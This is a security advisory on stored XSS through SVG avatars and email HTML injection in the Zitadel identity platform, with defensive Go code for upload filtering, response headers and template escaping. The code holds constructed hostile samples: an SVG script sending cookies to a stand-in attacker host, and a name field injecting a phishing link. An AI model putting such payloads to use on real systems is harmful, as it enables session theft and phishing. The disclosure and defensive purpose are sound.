Cythera Cyber Security

Zitadel Exploit Enables One-Click Account Compromise

Stored XSS combined with email injection vulnerabilities may be used to silently hijack user accounts, bypassing traditional alerts and authentication mechanisms.

Introduction

Zitadel is an open-source identity platform designed to streamline identity management so developers can concentrate on core business features. Supporting B2B, B2C, and machine-to-machine (M2M) use cases, Zitadel delivers key capabilities out of the box — including hosted login, passwordless and multi-factor authentication, single sign-on (SSO), OpenID Connect, SAML, fine-grained authorisation, and a highly extensible API-driven architecture with support for custom code actions.

The Vulnerability

During an assessment, Cythera uncovered a stored Cross-Site Scripting (XSS) vulnerability in Zitadel. A single click on an attacker-controlled link was enough: once the victim opened the payload, it performed a silent account takeover with no further interaction. The vulnerability was assigned CVE-2023-46238 with a CVSS 3.1 score of 8.7 (High). Zitadel worked cooperatively with Cythera during disclosure, ensuring swift triage and mitigation.

Vulnerability Discovery

During an assessment of a Zitadel deployment, it was found that SVG files could be uploaded as user avatars. While Zitadel applied a strict Content Security Policy (CSP) on its main dashboard pages, the endpoint that served uploaded files returned no CSP at all. These files were also served without a Content-Disposition: attachment header, so a browser that navigated to the avatar URL rendered the SVG as a document under Zitadel's domain and executed any script it contained. (An SVG embedded through an <img> tag does not run script; the attack relies on the victim opening the file's own URL.)

Further research revealed that JavaScript executing in that context runs with the victim's Zitadel session and can therefore interact with Zitadel's authentication system. Specifically, it could complete an OAuth authorisation flow to obtain an access token for the victim, and then use that token to generate a passwordless login link. This link could be silently sent to an attacker-controlled server, effectively enabling a stealthy account takeover.

Zitadel was also found to reflect user-supplied profile fields into outgoing emails as raw HTML. By injecting crafted markup into user input fields (such as "Family Name"), attackers could manipulate the layout and content of those emails. This technique could be used to deliver malicious links to unsuspecting users via trusted-looking emails, making the exploit even more effective. The Zitadel team acknowledged the email injection as an already-known issue rather than a newly introduced one (an "N-day" in common parlance).

Proof of Concepts

Silent Account Takeover

A proof-of-concept demonstrated that:

  • An attacker could upload an SVG file containing JavaScript as a user avatar.
  • When this image was viewed, the JavaScript would initiate an OAuth authorisation process, obtain an access token, and then use Zitadel’s own APIs to create a passwordless login link tied to the victim’s account.
  • This link would then be sent to a server controlled by the attacker, allowing them to log in without a password.
  • Beyond opening the avatar URL, the attack did not rely on tricking the user into doing anything; the process happened silently once the image loaded.
  • A simpler version of this exploit could be used to exfiltrate only the OAuth access token, which would also allow the attacker to act as the user.
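The serving-side weaknesses described above (no CSP on the file endpoint, no Content-Disposition: attachment, SVG accepted as-is) can be checked and closed in code. The following Go program is an added example written for this page; it is not Zitadel's code and does not use Zitadel's APIs. It assumes a hypothetical asset path and hypothetical helper names (CheckSVG, ServeUpload, ResponseHeaders), and the sample SVGs are constructed for the demonstration. CheckSVG rejects uploads that carry script-capable content, and ServeUpload shows the response headers that stop a stored file from running as a document on the identity provider's origin even if such content slips through.

```go
package main

import (
	"encoding/xml"
	"errors"
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"strings"
)

// ErrActiveContent is returned when an uploaded SVG carries content that a
// browser would execute if the file were opened at its own URL.
var ErrActiveContent = errors.New("svg contains active content")

// CheckSVG walks the XML token stream of an uploaded SVG and rejects the
// constructs that turn an avatar into a script host: <script> and
// <foreignObject> elements, on* event-handler attributes, and href values
// with a javascript: scheme. Hypothetical upload-time filter, not Zitadel's.
func CheckSVG(r io.Reader) error {
	dec := xml.NewDecoder(r)
	dec.Strict = false // tolerate the sloppy markup real uploads contain
	for {
		tok, err := dec.Token()
		if errors.Is(err, io.EOF) {
			return nil
		}
		if err != nil {
			return fmt.Errorf("malformed svg: %w", err)
		}
		el, ok := tok.(xml.StartElement)
		if !ok {
			continue
		}
		switch strings.ToLower(el.Name.Local) {
		case "script", "foreignobject":
			return ErrActiveContent
		}
		for _, a := range el.Attr {
			name := strings.ToLower(a.Name.Local)
			value := strings.ToLower(strings.TrimSpace(a.Value))
			if strings.HasPrefix(name, "on") || (name == "href" && strings.HasPrefix(value, "javascript:")) {
				return ErrActiveContent
			}
		}
	}
}

// ServeUpload serves a stored file the way a hardened asset endpoint should.
// Content-Disposition: attachment stops the browser from rendering the file
// as a top-level document (an <img> still displays it), nosniff pins the
// declared type, and the CSP leaves any script that does run with no origin,
// no cookies and no network. Hypothetical handler, not Zitadel's.
func ServeUpload(contentType string, body []byte) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		h := w.Header()
		h.Set("Content-Type", contentType)
		h.Set("Content-Disposition", "attachment")
		h.Set("X-Content-Type-Options", "nosniff")
		h.Set("Content-Security-Policy", "default-src 'none'; sandbox")
		w.WriteHeader(http.StatusOK)
		_, _ = w.Write(body)
	})
}

// ResponseHeaders issues one in-memory GET against h and returns the response
// headers, so the hardening can be verified without a live server. The
// request path is an assumed one.
func ResponseHeaders(h http.Handler) http.Header {
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, httptest.NewRequest(http.MethodGet, "/assets/v1/users/me/avatar", nil))
	return rec.Result().Header
}

func main() {
	// Constructed samples: a benign avatar and one carrying the kind of
	// exfiltration script the advisory describes.
	benign := `<svg xmlns="http://www.w3.org/2000/svg"><circle cx="8" cy="8" r="8"/></svg>`
	hostile := `<svg xmlns="http://www.w3.org/2000/svg"><script>fetch("https://attacker.invalid/?c=" + document.cookie)</script></svg>`

	fmt.Println("benign:", CheckSVG(strings.NewReader(benign)))
	fmt.Println("hostile:", CheckSVG(strings.NewReader(hostile)))

	hdr := ResponseHeaders(ServeUpload("image/svg+xml", []byte(benign)))
	fmt.Println("CSP:", hdr.Get("Content-Security-Policy"))
	fmt.Println("Disposition:", hdr.Get("Content-Disposition"))
}
```

The two layers are deliberately independent: the filter is an allow-list on what is stored, while the headers assume the filter can be bypassed and make sure a stored file never gets a first-party origin. Serving user uploads from a separate, cookie-less domain is the usual third layer, and is not shown here.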

Email Injection

It was also demonstrated that Zitadel's email templates could be manipulated using HTML inserted into fields like the user's "Family Name". For instance, closing tags placed in the name could terminate sections of the email early, and an opening HTML comment could hide the legitimate content that followed, allowing the attacker to craft an email that appears entirely normal and trustworthy to the recipient while actually presenting only attacker-controlled content.
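The difference between a template that substitutes profile fields verbatim and one that encodes them for their HTML context is the whole of this bug class. The Go program below is an added illustration for this page, not Zitadel's template code: the notification template, the Notification type, the helper names and the hostile profile are all constructed for the demonstration. RenderRaw reproduces the injection with text/template, RenderEscaped shows the same template under html/template, and HidesLegitimateContent detects the unclosed-comment trick in a rendered body.

```go
package main

import (
	"bytes"
	"fmt"
	htmltemplate "html/template"
	"strings"
	texttemplate "text/template"
)

// notificationTmpl is a constructed stand-in for a verification email. The
// user's family name is rendered into the body right before the legitimate link.
const notificationTmpl = `<table>
<tr><td>Hello {{.FamilyName}},</td></tr>
<tr><td>Please <a href="{{.VerifyURL}}">verify your email address</a>.</td></tr>
</table>`

// Notification is the data handed to the template.
type Notification struct {
	FamilyName string
	VerifyURL  string
}

// RenderRaw substitutes the fields verbatim, which is what an email system does
// when it treats user profile data as trusted markup.
func RenderRaw(n Notification) (string, error) {
	t, err := texttemplate.New("mail").Parse(notificationTmpl)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := t.Execute(&buf, n); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// RenderEscaped uses html/template, which encodes each value for the context
// it lands in: tags in the family name become text, and the href is treated as a URL.
func RenderEscaped(n Notification) (string, error) {
	t, err := htmltemplate.New("mail").Parse(notificationTmpl)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := t.Execute(&buf, n); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// HidesLegitimateContent reports whether the rendered body ends in an unclosed
// HTML comment, the trick that lets injected markup swallow everything after it.
func HidesLegitimateContent(body string) bool {
	open := strings.LastIndex(body, "<!--")
	return open >= 0 && !strings.Contains(body[open:], "-->")
}

func main() {
	// Constructed profile: the family name closes the greeting cell, inserts
	// an attacker link, and opens a comment so the real link never shows.
	hostile := Notification{
		FamilyName: `Smith</td></tr><tr><td><a href="https://attacker.invalid/login">Confirm your account now</a></td></tr></table><!--`,
		VerifyURL:  "https://idp.example.com/verify?code=abc123",
	}
	raw, _ := RenderRaw(hostile)
	safe, _ := RenderEscaped(hostile)
	fmt.Println("raw hides legitimate content:", HidesLegitimateContent(raw))
	fmt.Println("escaped hides legitimate content:", HidesLegitimateContent(safe))
	fmt.Println(safe)
}
```

The same principle applies to any templating engine: user-controlled fields must be encoded by the renderer for the context they are placed in, not sanitised once at input time, because the same name is later reused in subject lines, plain-text alternatives and other HTML contexts with different escaping rules.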

Potential Impact

These vulnerabilities combined could allow for:

  • Complete account takeover, with no knowledge of the password and no user interaction beyond opening a link
  • Delivery of malicious emails using Zitadel’s own infrastructure
  • Phishing-like attacks that appear to come from a legitimate source

How to Fix

Zitadel has resolved these issues. Users should update to one of the patched versions:

  • Version 2.28.2
  • Version 2.39.2

More information is available on Zitadel’s official security advisory page.

Vulnerability Disclosure Timeline

  • 12 October 2023 – Stored XSS vulnerability reported to the vendor
  • 13 October 2023 – Vendor responded to the initial report
  • 13 October 2023 – Email injection vulnerability also disclosed
  • 16 October 2023 – Vendor acknowledged email injection and requested proof of impact for the XSS
  • 19 October 2023 – Proof-of-concept for silent account takeover submitted
  • 19 October 2023 – Vendor acknowledged the PoC and started further investigation
  • 25 October 2023 – Vendor continued assessing the impact
  • 26 October 2023 – Issues were patched, a security advisory was published, and a CVE identifier was issued

